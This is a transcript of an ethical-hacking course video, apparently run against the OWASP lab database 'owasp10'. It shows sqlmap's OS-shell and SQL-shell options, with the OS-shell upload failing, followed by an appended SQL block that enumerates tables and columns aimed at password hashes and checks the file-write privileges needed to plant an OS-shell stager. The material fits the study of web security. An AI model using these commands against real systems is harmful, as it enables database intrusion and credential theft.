1
00:00:02,610 --> 00:00:08,990
sqlmap also allows you to get different types of shells on the target server, so you can actually try

2
00:00:08,990 --> 00:00:12,670
to get an OS shell using the --os-shell argument.

3
00:00:13,040 --> 00:00:23,490
So all you have to do is just run sqlmap, put in your URL, and then ask for an OS shell. Now, in

4
00:00:23,490 --> 00:00:26,660
my case, we've seen that we can't actually upload files to the server.

5
00:00:26,700 --> 00:00:28,770
So now it's asking me what I want.

6
00:00:28,770 --> 00:00:31,140
What is the language that's used on the server?

7
00:00:31,150 --> 00:00:38,900
It's using PHP, and you can see that the file cannot be uploaded; it's giving a 404 error,

8
00:00:39,070 --> 00:00:44,560
because my website, my target, doesn't allow my MySQL user to upload stuff.

9
00:00:44,630 --> 00:00:49,610
If this works, you'll actually get an OS shell and you'll be able to run OS commands on the target

10
00:00:49,640 --> 00:00:52,200
computer. And another

11
00:00:52,200 --> 00:01:00,490
cool thing is you can ask for a SQL shell.

12
00:01:00,730 --> 00:01:06,040
And what this will give you: it will allow you to run any SQL statement straight away, as if you're

13
00:01:06,040 --> 00:01:07,740
logged in through MySQL.

14
00:01:07,750 --> 00:01:12,340
So we were able to do that before using the union select, but

15
00:01:12,370 --> 00:01:18,460
in this you'll actually be writing proper SQL queries, and they will be much easier

16
00:01:18,460 --> 00:01:23,770
to write, much easier to read, so you'll actually be able to run more powerful attacks.

17
00:01:23,770 --> 00:01:27,730
For example, we can just select the user by saying current_user

18
00:01:31,480 --> 00:01:42,630
or we can just say user(). We can also get our current database by asking for database().

19
00:01:42,670 --> 00:01:46,810
You can look up SQL syntax and then run any SQL command you want.
20
00:01:46,810 --> 00:01:51,160
For example, if we wanted to select all of the tables like we were doing before, we can just do a select

21
00:01:52,770 --> 00:01:53,460
table_name

22
00:01:56,580 --> 00:02:00,440
from information_schema.tables

23
00:02:07,140 --> 00:02:09,480
where table_schema

24
00:02:13,780 --> 00:02:15,790
equal to owasp10. Then

25
00:02:24,400 --> 00:02:27,420
... and I probably made a mistake here; I forgot something. Then

26
00:02:27,450 --> 00:02:29,140
So I'm just going to go in here.

27
00:02:29,190 --> 00:02:29,760
Enter.

28
00:02:35,110 --> 00:02:37,790
There's actually an underscore here.

29
00:02:38,960 --> 00:02:39,920
Sorry about that.

30
00:02:40,830 --> 00:02:45,500
And as you can see, now we're getting all of the tables related to the database called

31
00:02:45,520 --> 00:02:51,010
owasp10. So again, here we can run any SQL statement that you want; it's just a nicer and easier way

32
00:02:51,250 --> 00:02:52,950
to execute your queries.
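The queries typed into sqlmap's --sql-shell in the video, written out as an added example (not the video's own commands) for MySQL/MariaDB. It assumes the target database is named owasp10 as in the video, and it goes one step further than the video by also enumerating columns and by checking the privileges that decide whether --os-shell can write a file at all.

```sql
-- Added example, not from the video: SQL you can paste into sqlmap's --sql-shell
-- (or any MySQL client) once injection gives you query execution.
-- Assumption: the target schema is called owasp10, as in the video.

-- Who are we connected as, and which database are we in?
SELECT current_user(), user(), database(), version();

-- Every table in the target database. information_schema is readable by any
-- MySQL user, which is why this works without extra privileges.
SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'owasp10';

-- Beyond the video: every column of every table in that database, in declared
-- order, so you can pick the interesting ones (user names, password hashes).
SELECT table_name, column_name, data_type
FROM information_schema.columns
WHERE table_schema = 'owasp10'
ORDER BY table_name, ordinal_position;

-- Why --os-shell failed in the video: sqlmap writes its stager with
-- SELECT ... INTO OUTFILE, which needs the FILE privilege and a web root
-- inside the secure_file_priv path. Check both before trying again.
SHOW GRANTS FOR CURRENT_USER();
SELECT @@secure_file_priv;
```

If SHOW GRANTS lists no FILE privilege, or @@secure_file_priv is NULL (file operations disabled) or points outside the web root, --os-shell cannot drop its stager and you should stay in --sql-shell and read data instead.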